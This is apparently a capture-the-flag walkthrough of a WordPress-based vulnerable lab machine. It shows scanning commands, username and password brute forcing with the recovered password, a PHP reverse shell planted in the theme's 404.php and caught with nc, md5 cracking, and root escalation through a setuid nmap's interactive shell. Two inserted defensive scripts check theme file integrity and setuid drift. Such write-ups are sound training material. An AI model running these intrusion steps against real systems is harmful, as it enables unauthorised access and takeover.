Information gathering
Same routine as usual
netdiscover scan
netdiscover -i wlan0 -r 192.168.0.0/24
Picked up the IP 192.168.0.103
nmap turns up almost nothing
just 80 and 443
the usual ports
22 is there but closed
Opened port 80
Lots of flashy stuff

Tried these commands; they only play animations, nothing useful
Then scanned for directories
---- Scanning URL: http://192.168.0.103/ ----
==> DIRECTORY: http://192.168.0.103/0/
==> DIRECTORY: http://192.168.0.103/admin/
+ http://192.168.0.103/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.103/audio/
==> DIRECTORY: http://192.168.0.103/blog/
==> DIRECTORY: http://192.168.0.103/css/
+ http://192.168.0.103/dashboard (CODE:302|SIZE:0)
+ http://192.168.0.103/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/feed/
==> DIRECTORY: http://192.168.0.103/image/
==> DIRECTORY: http://192.168.0.103/Image/
==> DIRECTORY: http://192.168.0.103/images/
+ http://192.168.0.103/index.html (CODE:200|SIZE:1188)
+ http://192.168.0.103/index.php (CODE:301|SIZE:0)
+ http://192.168.0.103/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.0.103/js/
+ http://192.168.0.103/license (CODE:200|SIZE:19930)
+ http://192.168.0.103/login (CODE:302|SIZE:0)
+ http://192.168.0.103/page1 (CODE:301|SIZE:0)
+ http://192.168.0.103/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.0.103/rdf (CODE:301|SIZE:0)
+ http://192.168.0.103/readme (CODE:200|SIZE:7334)
+ http://192.168.0.103/robots (CODE:200|SIZE:41)
+ http://192.168.0.103/robots.txt (CODE:200|SIZE:41)
+ http://192.168.0.103/rss (CODE:301|SIZE:0)
+ http://192.168.0.103/rss2 (CODE:301|SIZE:0)
+ http://192.168.0.103/sitemap (CODE:200|SIZE:0)
+ http://192.168.0.103/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/video/
==> DIRECTORY: http://192.168.0.103/wp-admin/
+ http://192.168.0.103/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/wp-content/
+ http://192.168.0.103/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/wp-includes/
+ http://192.168.0.103/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.0.103/wp-load (CODE:200|SIZE:0)
+ http://192.168.0.103/wp-login (CODE:200|SIZE:2689)
+ http://192.168.0.103/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.0.103/wp-settings (CODE:500|SIZE:0)
+ http://192.168.0.103/wp-signup (CODE:302|SIZE:0)
+ http://192.168.0.103/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.0.103/xmlrpc.php (CODE:405|SIZE:42)
Clicked through them one by one
Found robots.txt, and learned the site is built on WordPress
It lists two files
the first is a password
the second is a wordlist
Deduplicate the wordlist
sort filename | uniq > 1.txt
wpscan (WordPress-specific scanner)
Enumerate users
wpscan --url http://192.168.0.103/ -e u
No username found
Tried Burp
Because the login form reports "invalid username" rather than a generic "username or password incorrect", the username can be brute-forced from the wordlist
A single-position brute force of the username found the accounts
ELLIOT
elliot
Elliot
wpscan brute force
wpscan --url http://192.168.0.103 -U elliot -P <wordlist path> -t <threads>
Found the password
ER28-0652
Intrusion
After reaching the logged-in dashboard
Everything is .php
WordPress is written in PHP, so a PHP reverse shell is needed
No need to generate one with msf; just use
/usr/share/laudanum/php/php-reverse-shell.php
After changing the IP and port in it
Paste it into 404.php, because no other page worked; this page needs no administrator privilege to trigger, so any 404 is enough to fire it
Then getshell
nc -nlvp 4444
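The 404.php edit above is exactly what a file-integrity check on the theme directory catches. The following is an added example, not code from the original writeup: it records SHA-256 hashes of every .php file in a theme at deploy time and later reports the files whose hash changed. The theme directory, baseline path and the two-file sample theme in the demo are constructed for the example and are not taken from the machine in the writeup.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect a web shell dropped
# into a theme file (such as the 404.php edit above) by hashing every .php file
# in the theme at deploy time and re-checking later. The demo theme below is
# constructed; the real theme directory and baseline path are assumptions.

# Record SHA-256 hashes of all .php files under a theme directory.
# Usage: theme_baseline <theme_dir> <baseline_file>   (use an absolute baseline path)
theme_baseline() {
    ( cd "$1" && find . -type f -name '*.php' -exec sha256sum {} + ) > "$2"
}

# Print the paths (relative to the theme directory) whose hash no longer
# matches the baseline, i.e. files edited since deployment.
# Usage: theme_check <theme_dir> <baseline_file>
theme_check() {
    ( cd "$1" && sha256sum -c --quiet "$2" 2>/dev/null ) | sed -n 's/: FAILED$//p'
}

# Demo on a constructed two-file theme: take the baseline, append a marker to
# 404.php, and show that only that file is reported.
demo_modified_theme() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/theme"
    printf '<?php get_header(); ?>\n' > "$tmp/theme/404.php"
    printf '<?php get_footer(); ?>\n' > "$tmp/theme/index.php"
    theme_baseline "$tmp/theme" "$tmp/baseline.txt"
    printf '<?php /* constructed tamper marker */ ?>\n' >> "$tmp/theme/404.php"
    theme_check "$tmp/theme" "$tmp/baseline.txt"
    rm -rf "$tmp"
}

demo_modified_theme
```

Run the baseline once against the deployed theme (for example from a cron job right after an update) and store the baseline file outside the web root; the check then reports the edited template name, which is the evidence the writeup's own 404.php trick would leave behind.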
The shell runs as an ordinary user
Then cd /home
Found an md5 file and a "2 of 3" txt file
No permission to read the txt
The md5 file contains
robot:c3fcd3d76192e4007dfb496cca67e13b
Then simply reverse the md5 hash
Switch user
su robot
Privilege escalation via SUID
Check whether there are SUID binaries that can be used to escalate
find / -type f -perm -u=s 2>/dev/null
Found
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
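The list above is only useful to an attacker because one entry (the nmap copy in /usr/local/bin) is not a normal setuid binary. The following is an added example, not code from the original writeup, showing the defender's version of the same check: list setuid files under a root and report any that are missing from an allowlist taken from a known-clean host. The demo tree and its allowlist are constructed for the example; on a real host the allowlist comes from a baseline scan of a freshly installed system.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit setuid binaries by
# diffing the current set against an allowlist, so an unexpected setuid file
# such as a copied nmap stands out. The demo tree below is constructed.

# Print setuid regular files under <root_dir>, one per line, sorted.
# Usage: list_suid <root_dir>
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Print setuid files under <root_dir> that do not appear (as exact lines)
# in <allowlist_file>. Exit status is non-zero when nothing is reported,
# which is the "no drift" case.
# Usage: suid_drift <root_dir> <allowlist_file>
suid_drift() {
    list_suid "$1" | grep -vxF -f "$2"
}

# Demo on a constructed tree: one expected setuid binary (bin/su), one
# non-setuid file (bin/ls), and an unexpected setuid copy of nmap.
demo_suid_drift() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/usr/local/bin"
    : > "$tmp/bin/su"
    : > "$tmp/bin/ls"
    : > "$tmp/usr/local/bin/nmap"
    chmod 4755 "$tmp/bin/su" "$tmp/usr/local/bin/nmap"
    chmod 0755 "$tmp/bin/ls"
    printf '%s\n' "$tmp/bin/su" > "$tmp/allow.txt"
    # strip the temp prefix so the report reads like a real path
    suid_drift "$tmp" "$tmp/allow.txt" | sed "s|^$tmp||"
    rm -rf "$tmp"
}

demo_suid_drift
```

Running `list_suid /` on a clean install and saving the output as the allowlist, then scheduling `suid_drift / /etc/suid-allowlist` (paths assumed), turns the one-off find command from the writeup into a recurring alert for exactly the kind of drift exploited here.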
Use nmap to escalate privileges
/usr/local/bin/nmap --interactive
然後!sh
Now in a root shell
Then cd /root and the third password is there
Done
Afterwards, on the principle of finishing what I started, I tried
cracking it
Not feasible: the laptop nearly melted, way too hot... not enough compute, only 300-odd per second, lol
Reference links:
Linux SUID privilege escalation
https://www.anquanke.com/post/id/86979
https://www.hack6.com/212503/blog.html
Everyone else keeps pushing forward; how could I stop.